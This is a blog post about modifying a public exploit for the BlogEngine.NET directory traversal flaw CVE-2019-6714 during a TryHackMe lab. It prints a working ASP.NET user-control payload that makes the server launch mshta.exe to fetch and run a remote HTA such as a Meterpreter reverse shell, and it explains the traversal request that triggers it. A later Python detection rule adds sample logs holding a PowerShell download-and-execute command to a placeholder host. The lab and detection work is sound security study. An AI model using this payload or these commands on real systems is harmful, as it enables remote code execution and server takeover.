Hey y’all. This will be a quick post discussing my experience in exploit development, where I modify the exploit for CVE-2019-6714; specifically, the exploit developed by Cobb (2019), which exploits a directory traversal vulnerability in the BlogEngine[.]NET content management system.
This was done for a TryHackMe boot2root machine, which I documented in the InfoSec Write-ups journal (see “Aleksey” 2022a; if the paywall is giving you problems, you can view it by opening your browser in private mode).
I discuss the specifics of how to exploit this vulnerability in my writeup, but the TL;DR is: upload an ASP.NET user control (a PostView.ascx file containing C# code) to a BlogEngine[.]NET site that is vulnerable to CVE-2019-6714, then trigger it with a GET request whose theme parameter uses ../ traversal to point at the directory the file was uploaded to; the server compiles the control and runs its C# while rendering the page.
I posted my modified version of Cobb’s exploit onto one of my GitHub repos. The source code, minus the comments, of my modified exploit is:
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
    // Runs when BlogEngine renders this control as the post view.
    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        // Launch mshta.exe from the IIS worker process; it fetches and runs the HTA.
        System.Diagnostics.Process payload = new System.Diagnostics.Process();
        payload.StartInfo.FileName = "mshta.exe";
        // Placeholder: set this to the URL of the HTA file that mshta.exe should execute.
        payload.StartInfo.Arguments = "";
        payload.StartInfo.UseShellExecute = true;
        // Note: CreateNoWindow only takes effect when UseShellExecute is false.
        payload.StartInfo.CreateNoWindow = true;
        payload.Start();
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
Cobb’s original exploit uses C#’s network socket classes to open a reverse shell back to the attacker’s machine. The TryHackMe room had me “upgrade” my shell to a Meterpreter shell, but I decided to bypass that by modifying Cobb’s exploit to execute code via mshta.exe, then generating a Meterpreter payload that is served as an HTA, uploading the modified script to the BlogEngine[.]NET website, triggering it and finally getting a reverse Meterpreter shell. The line payload.StartInfo.Arguments = ""; should contain the URL of the malicious HTA file; mshta.exe fetches that file and runs it (note that the HTA can carry any payload, not necessarily a reverse Meterpreter shell).
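A check a defender would want alongside this modification, as an added example that is not part of the original post or of Cobb’s exploit: the mshta.exe variant means the IIS worker process (w3wp.exe) spawns mshta.exe with an http URL on its command line, which is a classic process-chain detection. The Python below runs such a rule over a few constructed Sysmon-style process-creation records (the user names and the 192.0.2.5 HTA URL are made up, and the field names follow Sysmon Event ID 1, which is an assumption about the log source).

```python
"""Flag the IIS worker process (w3wp.exe) spawning mshta.exe with a remote HTA.

Constructed Sysmon Event ID 1 style records; not real telemetry. The HTA URL
points at 192.0.2.5 (TEST-NET), a placeholder for the attacker's HTA server.
"""
import json
import re

SAMPLE_EVENTS = [
    # The modified exploit: w3wp.exe launches mshta.exe with an http URL.
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://192.0.2.5:8080/payload.hta',
     "User": r"IIS APPPOOL\BlogEngine"},
    # Benign noise: a console host spawned under the worker process.
    {"EventID": 1, "Image": r"C:\Windows\System32\conhost.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "User": r"IIS APPPOOL\BlogEngine"},
    # A user opening a local HTA from the desktop: wrong parent, no URL.
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Users\alice\report.hta',
     "User": r"HOST\alice"},
    # A different living-off-the-land binary under w3wp.exe, also worth a look.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.5/a')",
     "User": r"IIS APPPOOL\BlogEngine"},
]

WEB_WORKERS = {"w3wp.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "rundll32.exe",
           "regsvr32.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return (severity, reason) for a suspicious process creation, else None."""
    if event.get("EventID") != 1:
        return None
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in WEB_WORKERS:
        return None
    urls = URL_RE.findall(event.get("CommandLine", ""))
    if child == "mshta.exe" and urls:
        return ("high", f"w3wp.exe spawned mshta.exe with remote HTA {urls[0]}")
    if child in LOLBINS:
        detail = f" fetching {urls[0]}" if urls else ""
        return ("medium", f"w3wp.exe spawned {child}{detail}")
    return None


def scan(events):
    """Run the rule over a list of events and return the alerts raised."""
    alerts = []
    for event in events:
        hit = evaluate(event)
        if hit:
            alerts.append({"severity": hit[0], "reason": hit[1],
                           "user": event.get("User")})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

The rule keys on the parent/child pair rather than on mshta.exe alone, so a user opening a local HTA does not fire, while any listed living-off-the-land binary under w3wp.exe is still surfaced at lower severity.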
Conclusion
This isn’t really a remarkable discovery, just “building off” the discovery of someone smarter than myself and trying to make my life easier. Plus, I’m trying to be a hacker, and what made me want to go on with modifying Cobb’s exploit is that I didn’t want to follow the room’s instructions exactly as laid out. I gotta deviate from it in some way.
Of course, I welcome any feedback or criticisms regarding my work.
References
- “Aleksey” (2022a). TryHackMe writeup: HackPark. InfoSec Write-ups. Retrieved on Dec. 31, 2022 from: https://infosecwriteups.com/tryhackme-writeup-hackpark-bd9c075c5262
- “Aleksey” (2022b). Infosec/CVE-2019-6714.cs GitHub Repository. Retrieved on Dec. 31, 2022 from: https://github.com/Alekseyyy/InfoSec/blob/master/exploits/CVE-2019-6714.cs
- BlogEngine.NET (n.d.). BlogEngine.NET | Free blogging platform. Retrieved on May 7, 2022 from: https://blogengine.io/
- Cobb, D. (2019). BlogEngine.NET <= 3.3.6 Directory Traversal RCE. Exploit Database. Retrieved on Dec. 31, 2022 from: BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution - ASPX webapps Exploit
- TryHackMe (n.d.-a). TryHackMe. Retrieved on Dec. 31, 2022 from: https://tryhackme.com/
- TryHackMe (n.d.-b). HackPark. TryHackMe. Retrieved on Dec. 31, 2022 from: https://tryhackme.com/room/hackpark